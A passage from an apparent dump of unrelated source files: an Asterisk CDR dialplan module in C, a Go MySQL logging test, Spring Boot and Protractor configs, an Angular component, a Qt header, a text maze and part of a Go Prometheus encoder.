For example, CDRs may not be modified after the Dial\n\t\t\tapplication has returned.\n\t\t\tExample: exten => 1,1,Set(CDR(userfield)=test)\n\t\t\n\t\n\t\n\t\t\n\t\t\tSet a property on a channel's CDR.\n\t\t\n\t\t\n\t\t\t\n\t\t\t\tThe property to set on the CDR.\n\t\t\t\t\n\t\t\t\t\t\n\t\t\t\t\t\tSet this channel as the preferred Party A when\n\t\t\t\t\t\tchannels are associated together.\n\t\t\t\t\t\tWrite-Only\n\t\t\t\t\t\n\t\t\t\t\t\n\t\t\t\t\t\tSetting to 1 will disable CDRs for this channel.\n\t\t\t\t\t\tSetting to 0 will enable CDRs for this channel.\n\t\t\t\t\t\tWrite-Only\n\t\t\t\t\t\n\t\t\t\t\n\t\t\t\n\t\t\n\t\t\n\t\t\tThis function sets a property on a channel's CDR. Properties\n\t\t\talter the behavior of how the CDR operates for that channel.\n\t\t\n\t\n ***/\n\nenum cdr_option_flags {\n\tOPT_UNPARSED = (1 << 1),\n\tOPT_FLOAT = (1 << 2),\n};\n\nAST_APP_OPTIONS(cdr_func_options, {\n\tAST_APP_OPTION('f', OPT_FLOAT),\n\tAST_APP_OPTION('u', OPT_UNPARSED),\n});\n\nstruct cdr_func_payload {\n\tstruct ast_channel *chan;\n\tconst char *cmd;\n\tconst char *arguments;\n\tconst char *value;\n\tvoid *data;\n};\n\nstruct cdr_func_data {\n\tchar *buf;\n\tsize_t len;\n};\n\nSTASIS_MESSAGE_TYPE_DEFN_LOCAL(cdr_read_message_type);\nSTASIS_MESSAGE_TYPE_DEFN_LOCAL(cdr_write_message_type);\nSTASIS_MESSAGE_TYPE_DEFN_LOCAL(cdr_prop_write_message_type);\n\nstatic struct timeval cdr_retrieve_time(struct ast_channel *chan, const char *time_name)\n{\n\tstruct timeval time = { 0 };\n\tchar *value = NULL;\n\tchar tempbuf[128];\n\tlong int tv_sec;\n\tlong int tv_usec;\n\n\tif (ast_strlen_zero(ast_channel_name(chan))) {\n\t\t/* Format request on a dummy channel */\n\t\tast_cdr_format_var(ast_channel_cdr(chan), time_name, &value, tempbuf, sizeof(tempbuf), 1);\n\t} else {\n\t\tast_cdr_getvar(ast_channel_name(chan), time_name, tempbuf, sizeof(tempbuf));\n\t}\n\n\t/* time.tv_usec is suseconds_t, which could be int or long */\n\tif (sscanf(tempbuf, \"%ld.%ld\", &tv_sec, &tv_usec) == 2) {\n\t\ttime.tv_sec = tv_sec;\n\t\ttime.tv_usec = tv_usec;\n\t} else {\n\t\tast_log(AST_LOG_WARNING, \"Failed to fully extract '%s' from CDR\\n\", time_name);\n\t}\n\n\treturn time;\n}\n\nstatic void cdr_read_callback(void *data, struct stasis_subscription *sub, struct stasis_message *message)\n{\n\tstruct cdr_func_payload *payload = stasis_message_data(message);\n\tstruct cdr_func_data *output;\n\tchar *info;\n\tchar *value = NULL;\n\tstruct ast_flags flags = { 0 };\n\tchar tempbuf[512];\n\tAST_DECLARE_APP_ARGS(args,\n\t\tAST_APP_ARG(variable);\n\t\tAST_APP_ARG(options);\n\t);\n\n\tif (cdr_read_message_type() != stasis_message_type(message)) {\n\t\treturn;\n\t}\n\n\tast_assert(payload != NULL);\n\toutput = payload->data;\n\tast_assert(output != NULL);\n\n\tif (ast_strlen_zero(payload->arguments)) {\n\t\tast_log(AST_LOG_WARNING, \"%s requires a variable (%s(variable[,option]))\\n)\",\n\t\t\tpayload->cmd, payload->cmd);\n\t\treturn;\n\t}\n\tinfo = ast_strdupa(payload->arguments);\n\tAST_STANDARD_APP_ARGS(args, info);\n\n\tif (!ast_strlen_zero(args.options)) {\n\t\tast_app_parse_options(cdr_func_options, &flags, NULL, args.options);\n\t}\n\n\tif (ast_strlen_zero(ast_channel_name(payload->chan))) {\n\t\t/* Format request on a dummy channel */\n\t\tast_cdr_format_var(ast_channel_cdr(payload->chan), args.variable, &value, tempbuf, sizeof(tempbuf), ast_test_flag(&flags, OPT_UNPARSED));\n\t\tif (ast_strlen_zero(value)) {\n\t\t\treturn;\n\t\t}\n\t\tast_copy_string(tempbuf, value, sizeof(tempbuf));\n\t\tast_set_flag(&flags, 
OPT_UNPARSED);\n\t} else if (ast_cdr_getvar(ast_channel_name(payload->chan), args.variable, tempbuf, sizeof(tempbuf))) {\n\t\treturn;\n\t}\n\n\tif (ast_test_flag(&flags, OPT_FLOAT)\n\t\t&& (!strcasecmp(\"billsec\", args.variable) || !strcasecmp(\"duration\", args.variable))) {\n\t\tstruct timeval start = cdr_retrieve_time(payload->chan, !strcasecmp(\"billsec\", args.variable) ? \"answer\" : \"start\");\n\t\tstruct timeval finish = cdr_retrieve_time(payload->chan, \"end\");\n\t\tdouble delta;\n\n\t\tif (ast_tvzero(finish)) {\n\t\t\tfinish = ast_tvnow();\n\t\t}\n\n\t\tif (ast_tvzero(start)) {\n\t\t\tdelta = 0.0;\n\t\t} else {\n\t\t\tdelta = (double)(ast_tvdiff_us(finish, start) / 1000000.0);\n\t\t}\n\t\tsnprintf(tempbuf, sizeof(tempbuf), \"%lf\", delta);\n\n\t} else if (!ast_test_flag(&flags, OPT_UNPARSED)) {\n\t\tif (!strcasecmp(\"start\", args.variable)\n\t\t\t|| !strcasecmp(\"end\", args.variable)\n\t\t\t|| !strcasecmp(\"answer\", args.variable)) {\n\t\t\tstruct timeval fmt_time;\n\t\t\tstruct ast_tm tm;\n\t\t\t/* tv_usec is suseconds_t, which could be int or long */\n\t\t\tlong int tv_sec;\n\t\t\tlong int tv_usec;\n\n\t\t\tif (sscanf(tempbuf, \"%ld.%ld\", &tv_sec, &tv_usec) != 2) {\n\t\t\t\tast_log(AST_LOG_WARNING, \"Unable to parse %s (%s) from the CDR for channel %s\\n\",\n\t\t\t\t\targs.variable, tempbuf, ast_channel_name(payload->chan));\n\t\t\t\treturn;\n\t\t\t}\n\t\t\tif (tv_sec) {\n\t\t\t\tfmt_time.tv_sec = tv_sec;\n\t\t\t\tfmt_time.tv_usec = tv_usec;\n\t\t\t\tast_localtime(&fmt_time, &tm, NULL);\n\t\t\t\tast_strftime(tempbuf, sizeof(tempbuf), \"%Y-%m-%d %T\", &tm);\n\t\t\t} else {\n\t\t\t\ttempbuf[0] = '\\0';\n\t\t\t}\n\t\t} else if (!strcasecmp(\"disposition\", args.variable)) {\n\t\t\tint disposition;\n\n\t\t\tif (sscanf(tempbuf, \"%8d\", &disposition) != 1) {\n\t\t\t\tast_log(AST_LOG_WARNING, \"Unable to parse %s (%s) from the CDR for channel %s\\n\",\n\t\t\t\t\targs.variable, tempbuf, ast_channel_name(payload->chan));\n\t\t\t\treturn;\n\t\t\t}\n\t\t\tsnprintf(tempbuf, sizeof(tempbuf), \"%s\", ast_cdr_disp2str(disposition));\n\t\t} else if (!strcasecmp(\"amaflags\", args.variable)) {\n\t\t\tint amaflags;\n\n\t\t\tif (sscanf(tempbuf, \"%8d\", &amaflags) != 1) {\n\t\t\t\tast_log(AST_LOG_WARNING, \"Unable to parse %s (%s) from the CDR for channel %s\\n\",\n\t\t\t\t\targs.variable, tempbuf, ast_channel_name(payload->chan));\n\t\t\t\treturn;\n\t\t\t}\n\t\t\tsnprintf(tempbuf, sizeof(tempbuf), \"%s\", ast_channel_amaflags2string(amaflags));\n\t\t}\n\t}\n\n\tast_copy_string(output->buf, tempbuf, output->len);\n}\n\nstatic void cdr_write_callback(void *data, struct stasis_subscription *sub, struct stasis_message *message)\n{\n\tstruct cdr_func_payload *payload;\n\tstruct ast_flags flags = { 0 };\n\tAST_DECLARE_APP_ARGS(args,\n\t\tAST_APP_ARG(variable);\n\t\tAST_APP_ARG(options);\n\t);\n\tchar *parse;\n\n\tif (cdr_write_message_type() != stasis_message_type(message)) {\n\t\treturn;\n\t}\n\tpayload = stasis_message_data(message);\n\tif (!payload) {\n\t\treturn;\n\t}\n\tif (ast_strlen_zero(payload->arguments)\n\t\t|| !payload->value) {\n\t\t/* Sanity check. 
cdr_write() could never send these bad messages */\n\t\tast_assert(0);\n\t\treturn;\n\t}\n\n\tparse = ast_strdupa(payload->arguments);\n\tAST_STANDARD_APP_ARGS(args, parse);\n\n\tif (!ast_strlen_zero(args.options)) {\n\t\tast_app_parse_options(cdr_func_options, &flags, NULL, args.options);\n\t}\n\n\t/* These are already handled by cdr_write() */\n\tast_assert(strcasecmp(args.variable, \"accountcode\")\n\t\t&& strcasecmp(args.variable, \"peeraccount\")\n\t\t&& strcasecmp(args.variable, \"amaflags\"));\n\n\tif (!strcasecmp(args.variable, \"userfield\")) {\n\t\tast_cdr_setuserfield(ast_channel_name(payload->chan), payload->value);\n\t} else {\n\t\tast_cdr_setvar(ast_channel_name(payload->chan), args.variable, payload->value);\n\t}\n}\n\nstatic void cdr_prop_write_callback(void *data, struct stasis_subscription *sub, struct stasis_message *message)\n{\n\tstruct cdr_func_payload *payload = stasis_message_data(message);\n\tenum ast_cdr_options option;\n\tchar *parse;\n\tAST_DECLARE_APP_ARGS(args,\n\t\tAST_APP_ARG(variable);\n\t\tAST_APP_ARG(options);\n\t);\n\n\tif (cdr_prop_write_message_type() != stasis_message_type(message)) {\n\t\treturn;\n\t}\n\n\tif (!payload) {\n\t\treturn;\n\t}\n\n\tif (ast_strlen_zero(payload->arguments)) {\n\t\tast_log(AST_LOG_WARNING, \"%s requires a variable (%s(variable)=value)\\n)\",\n\t\t\tpayload->cmd, payload->cmd);\n\t\treturn;\n\t}\n\tif (ast_strlen_zero(payload->value)) {\n\t\tast_log(AST_LOG_WARNING, \"%s requires a value (%s(variable)=value)\\n)\",\n\t\t\tpayload->cmd, payload->cmd);\n\t\treturn;\n\t}\n\tparse = ast_strdupa(payload->arguments);\n\tAST_STANDARD_APP_ARGS(args, parse);\n\n\tif (!strcasecmp(\"party_a\", args.variable)) {\n\t\toption = AST_CDR_FLAG_PARTY_A;\n\t} else if (!strcasecmp(\"disable\", args.variable)) {\n\t\toption = AST_CDR_FLAG_DISABLE_ALL;\n\t} else {\n\t\tast_log(AST_LOG_WARNING, \"Unknown option %s used with %s\\n\", args.variable, payload->cmd);\n\t\treturn;\n\t}\n\n\tif (ast_true(payload->value)) {\n\t\tast_cdr_set_property(ast_channel_name(payload->chan), option);\n\t} else {\n\t\tast_cdr_clear_property(ast_channel_name(payload->chan), option);\n\t}\n}\n\n\nstatic int cdr_read(struct ast_channel *chan, const char *cmd, char *parse,\n\t\t char *buf, size_t len)\n{\n\tRAII_VAR(struct stasis_message *, message, NULL, ao2_cleanup);\n\tRAII_VAR(struct cdr_func_payload *, payload, NULL, ao2_cleanup);\n\tstruct cdr_func_data output = { 0, };\n\n\tif (!chan) {\n\t\tast_log(LOG_WARNING, \"No channel was provided to %s function.\\n\", cmd);\n\t\treturn -1;\n\t}\n\n\tif (!cdr_read_message_type()) {\n\t\tast_log(AST_LOG_WARNING, \"Failed to manipulate CDR for channel %s: message type not available\\n\",\n\t\t\tast_channel_name(chan));\n\t\treturn -1;\n\t}\n\n\tpayload = ao2_alloc(sizeof(*payload), NULL);\n\tif (!payload) {\n\t\treturn -1;\n\t}\n\tpayload->chan = chan;\n\tpayload->cmd = cmd;\n\tpayload->arguments = parse;\n\tpayload->data = &output;\n\n\tbuf[0] = '\\0';/* Ensure the buffer is initialized. */\n\toutput.buf = buf;\n\toutput.len = len;\n\n\tmessage = stasis_message_create(cdr_read_message_type(), payload);\n\tif (!message) {\n\t\tast_log(AST_LOG_WARNING, \"Failed to manipulate CDR for channel %s: unable to create message\\n\",\n\t\t\tast_channel_name(chan));\n\t\treturn -1;\n\t}\n\n\t/* If this is a request on a dummy channel, we're doing post-processing on an\n\t * already dispatched CDR. 
Simply call the callback to calculate the value and\n\t * return, instead of posting to Stasis as we would for a running channel.\n\t */\n\tif (ast_strlen_zero(ast_channel_name(chan))) {\n\t\tcdr_read_callback(NULL, NULL, message);\n\t} else {\n\t\tRAII_VAR(struct stasis_message_router *, router, ast_cdr_message_router(), ao2_cleanup);\n\n\t\tif (!router) {\n\t\t\tast_log(AST_LOG_WARNING, \"Failed to manipulate CDR for channel %s: no message router\\n\",\n\t\t\t\tast_channel_name(chan));\n\t\t\treturn -1;\n\t\t}\n\t\tstasis_message_router_publish_sync(router, message);\n\t}\n\n\treturn 0;\n}\n\nstatic int cdr_write(struct ast_channel *chan, const char *cmd, char *arguments,\n\tconst char *value)\n{\n\tstruct stasis_message *message;\n\tstruct cdr_func_payload *payload;\n\tstruct stasis_message_router *router;\n\tAST_DECLARE_APP_ARGS(args,\n\t\tAST_APP_ARG(variable);\n\t\tAST_APP_ARG(options);\n\t);\n\tchar *parse;\n\n\tif (!chan) {\n\t\tast_log(LOG_WARNING, \"No channel was provided to %s function.\\n\", cmd);\n\t\treturn -1;\n\t}\n\tif (ast_strlen_zero(arguments)) {\n\t\tast_log(LOG_WARNING, \"%s requires a variable (%s(variable)=value)\\n)\",\n\t\t\tcmd, cmd);\n\t\treturn -1;\n\t}\n\tif (!value) {\n\t\tast_log(LOG_WARNING, \"%s requires a value (%s(variable)=value)\\n)\",\n\t\t\tcmd, cmd);\n\t\treturn -1;\n\t}\n\n\tparse = ast_strdupa(arguments);\n\tAST_STANDARD_APP_ARGS(args, parse);\n\n\t/* These CDR variables are no longer supported or set directly on the channel */\n\tif (!strcasecmp(args.variable, \"accountcode\")) {\n\t\tast_log(LOG_WARNING, \"Using the %s function to set 'accountcode' is deprecated. Please use the CHANNEL function instead.\\n\",\n\t\t\tcmd);\n\t\tast_channel_lock(chan);\n\t\tast_channel_accountcode_set(chan, value);\n\t\tast_channel_unlock(chan);\n\t\treturn 0;\n\t}\n\tif (!strcasecmp(args.variable, \"amaflags\")) {\n\t\tint amaflags;\n\n\t\tast_log(LOG_WARNING, \"Using the %s function to set 'amaflags' is deprecated. Please use the CHANNEL function instead.\\n\",\n\t\t\tcmd);\n\t\tif (isdigit(*value)) {\n\t\t\tif (sscanf(value, \"%30d\", &amaflags) != 1) {\n\t\t\t\tamaflags = AST_AMA_NONE;\n\t\t\t}\n\t\t} else {\n\t\t\tamaflags = ast_channel_string2amaflag(value);\n\t\t}\n\t\tast_channel_lock(chan);\n\t\tast_channel_amaflags_set(chan, amaflags);\n\t\tast_channel_unlock(chan);\n\t\treturn 0;\n\t}\n\tif (!strcasecmp(args.variable, \"peeraccount\")) {\n\t\tast_log(LOG_WARNING, \"The 'peeraccount' setting is not supported. 
Please set the 'accountcode' on the appropriate channel using the CHANNEL function.\\n\");\n\t\treturn 0;\n\t}\n\n\t/* The remaining CDR variables are handled by CDR processing code */\n\tif (!cdr_write_message_type()) {\n\t\tast_log(LOG_WARNING, \"Failed to manipulate CDR for channel %s: message type not available\\n\",\n\t\t\tast_channel_name(chan));\n\t\treturn -1;\n\t}\n\n\tpayload = ao2_alloc(sizeof(*payload), NULL);\n\tif (!payload) {\n\t\treturn -1;\n\t}\n\tpayload->chan = chan;\n\tpayload->cmd = cmd;\n\tpayload->arguments = arguments;\n\tpayload->value = value;\n\n\tmessage = stasis_message_create(cdr_write_message_type(), payload);\n\tao2_ref(payload, -1);\n\tif (!message) {\n\t\tast_log(LOG_WARNING, \"Failed to manipulate CDR for channel %s: unable to create message\\n\",\n\t\t\tast_channel_name(chan));\n\t\treturn -1;\n\t}\n\trouter = ast_cdr_message_router();\n\tif (!router) {\n\t\tast_log(LOG_WARNING, \"Failed to manipulate CDR for channel %s: no message router\\n\",\n\t\t\tast_channel_name(chan));\n\t\tao2_ref(message, -1);\n\t\treturn -1;\n\t}\n\tstasis_message_router_publish_sync(router, message);\n\tao2_ref(router, -1);\n\tao2_ref(message, -1);\n\n\treturn 0;\n}\n\nstatic int cdr_prop_write(struct ast_channel *chan, const char *cmd, char *parse,\n\t\t const char *value)\n{\n\tRAII_VAR(struct stasis_message *, message, NULL, ao2_cleanup);\n\tRAII_VAR(struct cdr_func_payload *, payload, NULL, ao2_cleanup);\n\tRAII_VAR(struct stasis_message_router *, router, ast_cdr_message_router(), ao2_cleanup);\n\n\tif (!chan) {\n\t\tast_log(LOG_WARNING, \"No channel was provided to %s function.\\n\", cmd);\n\t\treturn -1;\n\t}\n\n\tif (!router) {\n\t\tast_log(AST_LOG_WARNING, \"Failed to manipulate CDR for channel %s: no message router\\n\",\n\t\t\tast_channel_name(chan));\n\t\treturn -1;\n\t}\n\n\tif (!cdr_prop_write_message_type()) {\n\t\tast_log(AST_LOG_WARNING, \"Failed to manipulate CDR for channel %s: message type not available\\n\",\n\t\t\tast_channel_name(chan));\n\t\treturn -1;\n\t}\n\n\tpayload = ao2_alloc(sizeof(*payload), NULL);\n\tif (!payload) {\n\t\treturn -1;\n\t}\n\tpayload->chan = chan;\n\tpayload->cmd = cmd;\n\tpayload->arguments = parse;\n\tpayload->value = value;\n\n\tmessage = stasis_message_create(cdr_prop_write_message_type(), payload);\n\tif (!message) {\n\t\tast_log(AST_LOG_WARNING, \"Failed to manipulate CDR for channel %s: unable to create message\\n\",\n\t\t\tast_channel_name(chan));\n\t\treturn -1;\n\t}\n\tstasis_message_router_publish_sync(router, message);\n\n\treturn 0;\n}\n\nstatic struct ast_custom_function cdr_function = {\n\t.name = \"CDR\",\n\t.read = cdr_read,\n\t.write = cdr_write,\n};\n\nstatic struct ast_custom_function cdr_prop_function = {\n\t.name = \"CDR_PROP\",\n\t.read = NULL,\n\t.write = cdr_prop_write,\n};\n\nstatic int unload_module(void)\n{\n\tRAII_VAR(struct stasis_message_router *, router, ast_cdr_message_router(), ao2_cleanup);\n\tint res = 0;\n\n\tif (router) {\n\t\tstasis_message_router_remove(router, cdr_prop_write_message_type());\n\t\tstasis_message_router_remove(router, cdr_write_message_type());\n\t\tstasis_message_router_remove(router, cdr_read_message_type());\n\t}\n\tSTASIS_MESSAGE_TYPE_CLEANUP(cdr_read_message_type);\n\tSTASIS_MESSAGE_TYPE_CLEANUP(cdr_write_message_type);\n\tSTASIS_MESSAGE_TYPE_CLEANUP(cdr_prop_write_message_type);\n\tres |= ast_custom_function_unregister(&cdr_function);\n\tres |= ast_custom_function_unregister(&cdr_prop_function);\n\n\treturn res;\n}\n\nstatic int load_module(void)\n{\n\tRAII_VAR(struct 
stasis_message_router *, router, ast_cdr_message_router(), ao2_cleanup);\n\tint res = 0;\n\n\tif (!router) {\n\t\treturn AST_MODULE_LOAD_DECLINE;\n\t}\n\n\tres |= STASIS_MESSAGE_TYPE_INIT(cdr_read_message_type);\n\tres |= STASIS_MESSAGE_TYPE_INIT(cdr_write_message_type);\n\tres |= STASIS_MESSAGE_TYPE_INIT(cdr_prop_write_message_type);\n\tres |= ast_custom_function_register(&cdr_function);\n\tres |= ast_custom_function_register(&cdr_prop_function);\n\tres |= stasis_message_router_add(router, cdr_prop_write_message_type(),\n\t cdr_prop_write_callback, NULL);\n\tres |= stasis_message_router_add(router, cdr_write_message_type(),\n\t cdr_write_callback, NULL);\n\tres |= stasis_message_router_add(router, cdr_read_message_type(),\n\t cdr_read_callback, NULL);\n\n\tif (res) {\n\t\tunload_module();\n\t\treturn AST_MODULE_LOAD_DECLINE;\n\t}\n\treturn AST_MODULE_LOAD_SUCCESS;\n}\n\nAST_MODULE_INFO(ASTERISK_GPL_KEY, AST_MODFLAG_DEFAULT, \"Call Detail Record (CDR) dialplan functions\",\n\t.support_level = AST_MODULE_SUPPORT_CORE,\n\t.load = load_module,\n\t.unload = unload_module,\n\t.requires = \"cdr\",\n);\n"} {"text": "package tealogs\n\nimport (\n\t\"github.com/TeaWeb/code/tealogs/accesslogs\"\n\t\"github.com/TeaWeb/code/teatesting\"\n\t\"testing\"\n\t\"time\"\n)\n\nfunc TestMySQLStorage_Write(t *testing.T) {\n\tif !teatesting.RequireMySQL() {\n\t\treturn\n\t}\n\n\tbefore := time.Now()\n\tdefer func() {\n\t\tt.Log(\"cost:\", time.Since(before).Seconds(), \"seconds\")\n\t}()\n\n\tstorage := &MySQLStorage{\n\t\tStorage: Storage{\n\t\t},\n\t\tHost: \"127.0.0.1\",\n\t\tPort: 3306,\n\t\tUsername: \"root\",\n\t\tPassword: \"123456\",\n\t\tDatabase: \"teaweb\",\n\t\tTable: \"accessLogs${date}\",\n\t\tLogField: \"log\",\n\t}\n\n\terr := storage.Start()\n\tif err != nil {\n\t\tt.Fatal(err)\n\t}\n\n\t{\n\t\tstorage.Format = StorageFormatJSON\n\t\tstorage.Template = `${timeLocal} \"${requestMethod} ${requestPath}\"`\n\t\terr := storage.Write([]*accesslogs.AccessLog{\n\t\t\t{\n\t\t\t\tRequestMethod: \"POST\",\n\t\t\t\tRequestPath: \"/1\",\n\t\t\t\tTimeLocal: time.Now().Format(\"2/Jan/2006:15:04:05 -0700\"),\n\t\t\t\tHeader: map[string][]string{\n\t\t\t\t\t\"Content-Type\": {\"text/html\"},\n\t\t\t\t},\n\t\t\t},\n\t\t\t{\n\t\t\t\tRequestMethod: \"GET\",\n\t\t\t\tRequestPath: \"/2\",\n\t\t\t\tTimeLocal: time.Now().Format(\"2/Jan/2006:15:04:05 -0700\"),\n\t\t\t\tHeader: map[string][]string{\n\t\t\t\t\t\"Content-Type\": {\"text/css\"},\n\t\t\t\t},\n\t\t\t},\n\t\t})\n\t\tif err != nil {\n\t\t\tt.Fatal(err)\n\t\t}\n\t}\n\n\terr = storage.Close()\n\tif err != nil {\n\t\tt.Fatal(err)\n\t}\n}\n"} {"text": "Feature: Finding a test file\n\nScenario: Finding a controller test\n Given I open the app file \"app/models/user.rb\"\n And file \"test/controllers/bars_controller_test.rb\" exists\n And I turn on projectile-rails-mode\n When I run command \"projectile-rails-find-test\" selecting \"controllers/bars_controller\"\n Then I am in file \"test/controllers/bars_controller_test.rb\"\n"} {"text": "{\n \"@type\" : \"g:Direction\",\n \"@value\" : \"OUT\"\n}"} {"text": "spring.application.name=zheng\nspring.application.description=hello, ${spring.application.name}!\nserver.port=9090\nserver.context-path=/springboot\nserver.error.path=/error\nserver.session-timeout=60\nserver.tomcat.uri-encoding=UTF-8\n########## 当前环境 ##########\nspring.profiles.active=prod\n########## 单数据源 
##########\n#spring.datasource.url=jdbc:mysql://localhost:3306/zheng\n#spring.datasource.username=root\n#spring.datasource.password=123456\n#spring.datasource.driver-class-name=com.mysql.jdbc.Driver\n########## 多数据源 ##########\nspring.datasource.primary.url=jdbc:mysql://localhost:3306/zheng\nspring.datasource.primary.username=root\nspring.datasource.primary.password=123456\nspring.datasource.primary.driver-class-name=com.mysql.jdbc.Driver\nspring.datasource.secondary.url=jdbc:mysql://localhost:3306/springboot\nspring.datasource.secondary.username=root\nspring.datasource.secondary.password=123456\nspring.datasource.secondary.driver-class-name=com.mysql.jdbc.Driver\n########## jpa ##########\nspring.jpa.properties.hibernate.hbm2ddl.auto=update\n########## 日志 ##########\nspring.output.ansi.enabled=DETECT\nlogging.file=springboot.log\nlogging.level.root=INFO\n########## REDIS (RedisProperties) ##########\n# Redis数据库索引(默认为0)\nspring.redis.database=0\n# Redis服务器地址\nspring.redis.host=redis-11291.c8.us-east-1-4.ec2.cloud.redislabs.com\n# Redis服务器连接端口\nspring.redis.port=11291\n# Redis服务器连接密码(默认为空)\nspring.redis.password=123456\n# 连接池最大连接数(使用负值表示没有限制)\nspring.redis.pool.max-active=8\n# 连接池最大阻塞等待时间(使用负值表示没有限制)\nspring.redis.pool.max-wait=-1\n# 连接池中的最大空闲连接\nspring.redis.pool.max-idle=8\n# 连接池中的最小空闲连接\nspring.redis.pool.min-idle=0\n# 连接超时时间(毫秒)\nspring.redis.timeout=0\n########## JavaMailSender ##########\nspring.mail.host=smtp.163.com\nspring.mail.username=\nspring.mail.password=\nspring.mail.properties.mail.smtp.auth=true\nspring.mail.properties.mail.smtp.starttls.enable=true\nspring.mail.properties.mail.smtp.starttls.required=true\n########## RabbitMQ ##########\nspring.rabbitmq.host=localhost\nspring.rabbitmq.port=5672\nspring.rabbitmq.username=guest\nspring.rabbitmq.password=guest"} {"text": "// Protractor configuration file, see link for more information\n// https://github.com/angular/protractor/blob/master/lib/config.ts\n\nconst { SpecReporter } = require('jasmine-spec-reporter');\n\nexports.config = {\n allScriptsTimeout: 11000,\n specs: [\n './e2e/**/*.e2e-spec.ts'\n ],\n capabilities: {\n 'browserName': 'chrome'\n },\n directConnect: true,\n baseUrl: 'http://localhost:4200/',\n framework: 'jasmine',\n jasmineNodeOpts: {\n showColors: true,\n defaultTimeoutInterval: 30000,\n print: function() {}\n },\n onPrepare() {\n require('ts-node').register({\n project: 'e2e/tsconfig.e2e.json'\n });\n jasmine.getEnv().addReporter(new SpecReporter({ spec: { displayStacktrace: true } }));\n }\n};\n"} {"text": "import { Component, OnInit } from '@angular/core';\nimport { Message } from '../_models/message';\nimport { Pagination } from '../_models/pagination';\nimport { ConfirmService } from '../_services/confirm.service';\nimport { MessageService } from '../_services/message.service';\n\n@Component({\n selector: 'app-messages',\n templateUrl: './messages.component.html',\n styleUrls: ['./messages.component.css']\n})\nexport class MessagesComponent implements OnInit {\n messages: Message[] = [];\n pagination: Pagination;\n container = 'Unread';\n pageNumber = 1;\n pageSize = 5;\n loading = false;\n\n constructor(private messageService: MessageService, private confirmService: ConfirmService) { }\n\n ngOnInit(): void {\n this.loadMessages();\n }\n\n loadMessages() {\n this.loading = true;\n this.messageService.getMessages(this.pageNumber, this.pageSize, this.container).subscribe(response => {\n this.messages = response.result;\n this.pagination = response.pagination;\n this.loading = false;\n })\n }\n\n 
deleteMessage(id: number) {\n this.confirmService.confirm('Confirm delete message', 'This cannot be undone').subscribe(result => {\n if (result) {\n this.messageService.deleteMessage(id).subscribe(() => {\n this.messages.splice(this.messages.findIndex(m => m.id === id), 1);\n })\n }\n })\n\n }\n\n pageChanged(event: any) {\n this.pageNumber = event.page;\n this.loadMessages();\n }\n\n}\n"} {"text": "/****************************************************************************\n**\n** Copyright (C) 2016 Jochen Becher\n** Contact: https://www.qt.io/licensing/\n**\n** This file is part of Qt Creator.\n**\n** Commercial License Usage\n** Licensees holding valid commercial Qt licenses may use this file in\n** accordance with the commercial license agreement provided with the\n** Software or, alternatively, in accordance with the terms contained in\n** a written agreement between you and The Qt Company. For licensing terms\n** and conditions see https://www.qt.io/terms-conditions. For further\n** information use the contact form at https://www.qt.io/contact-us.\n**\n** GNU General Public License Usage\n** Alternatively, this file may be used under the terms of the GNU\n** General Public License version 3 as published by the Free Software\n** Foundation with exceptions as appearing in the file LICENSE.GPL3-EXCEPT\n** included in the packaging of this file. Please review the following\n** information to ensure the GNU General Public License requirements will\n** be met: https://www.gnu.org/licenses/gpl-3.0.html.\n**\n****************************************************************************/\n\n#pragma once\n\n#include \n#include \n\nQT_BEGIN_NAMESPACE\nclass QPolygonF;\nclass QLineF;\nclass QPointF;\nclass QRectF;\nclass QSizeF;\nQT_END_NAMESPACE\n\nnamespace qmt {\n\nclass GeometryUtilities\n{\n GeometryUtilities() = delete;\n\npublic:\n enum Side {\n SideUnspecified,\n SideTop,\n SideBottom,\n SideLeft,\n SideRight\n };\n\n static QLineF stretch(const QLineF &line, double p1Extension, double p2Extension);\n static bool intersect(const QPolygonF &polygon, const QLineF &line,\n QPointF *intersectionPoint = nullptr, QLineF *intersectionLine = nullptr,\n int nearestPoint = 1);\n static bool intersect(const QList &polygons, const QLineF &line,\n int *intersectionPolygon, QPointF *intersectionPoint = nullptr, QLineF *intersectionLine = nullptr,\n int nearestPoint = 1);\n static bool placeRectAtLine(const QRectF &rect, const QLineF &line, double lineOffset,\n double distance, const QLineF &intersectionLine, QPointF *placement,\n Side *horizontalAlignedSide);\n static double calcAngle(const QLineF &line);\n static double calcDistancePointToLine(const QPointF &point, const QLineF &line);\n static QPointF calcProjection(const QLineF &line, const QPointF &point);\n static QPointF calcPrimaryAxisDirection(const QLineF &line);\n static QPointF calcSecondaryAxisDirection(const QLineF &line);\n static void adjustPosAndRect(QPointF *pos, QRectF *rect, const QPointF &topLeftDelta,\n const QPointF &bottomRightDelta, const QPointF &relativeAlignment);\n static QSizeF ensureMinimumRasterSize(const QSizeF &size, double rasterWidth,\n double rasterHeight);\n};\n\n} // namespace qmt\n"} {"text": "################\n#0#.....#......9\n#.#.#####.######\n#.......#.#.#..6\n#.#####.#.#.#.##\n#3#5#...........\n###.###.#######.\n#...#8..#...#1..\n#.#####.###.####\n#.......#.#...#.\n#.#.#####.#.###.\n#.#.#.#4#.......\n#.###.#.#.#.####\n#.........#.....\n###.#.#####.#.##\n#7..#.#.....#..2\n"} {"text": "package 
prometheus\n\nimport (\n\t\"bytes\"\n\t\"encoding/json\"\n\t\"io\"\n\t\"math\"\n\t\"strconv\"\n\t\"time\"\n\n\t\"github.com/influxdata/influxdb/v2/models\"\n\tdto \"github.com/prometheus/client_model/go\"\n\t\"github.com/prometheus/common/expfmt\"\n)\n\n// Encoder transforms metric families into bytes.\ntype Encoder interface {\n\t// Encode encodes metrics into bytes.\n\tEncode(mfs []*dto.MetricFamily) ([]byte, error)\n}\n\n// Expfmt encodes metric families into prometheus exposition format.\ntype Expfmt struct {\n\tFormat expfmt.Format\n}\n\n// Encode encodes metrics into prometheus exposition format bytes.\nfunc (e *Expfmt) Encode(mfs []*dto.MetricFamily) ([]byte, error) {\n\treturn EncodeExpfmt(mfs, e.Format)\n}\n\n// DecodeExpfmt decodes the reader of format into metric families.\nfunc DecodeExpfmt(r io.Reader, format expfmt.Format) ([]*dto.MetricFamily, error) {\n\tdec := expfmt.NewDecoder(r, format)\n\tmfs := []*dto.MetricFamily{}\n\tfor {\n\t\tvar mf dto.MetricFamily\n\t\tif err := dec.Decode(&mf); err != nil {\n\t\t\tif err == io.EOF {\n\t\t\t\tbreak\n\t\t\t}\n\t\t\tif err != nil {\n\t\t\t\treturn nil, err\n\t\t\t}\n\t\t}\n\t\tmfs = append(mfs, &mf)\n\t}\n\treturn mfs, nil\n}\n\n// EncodeExpfmt encodes the metrics 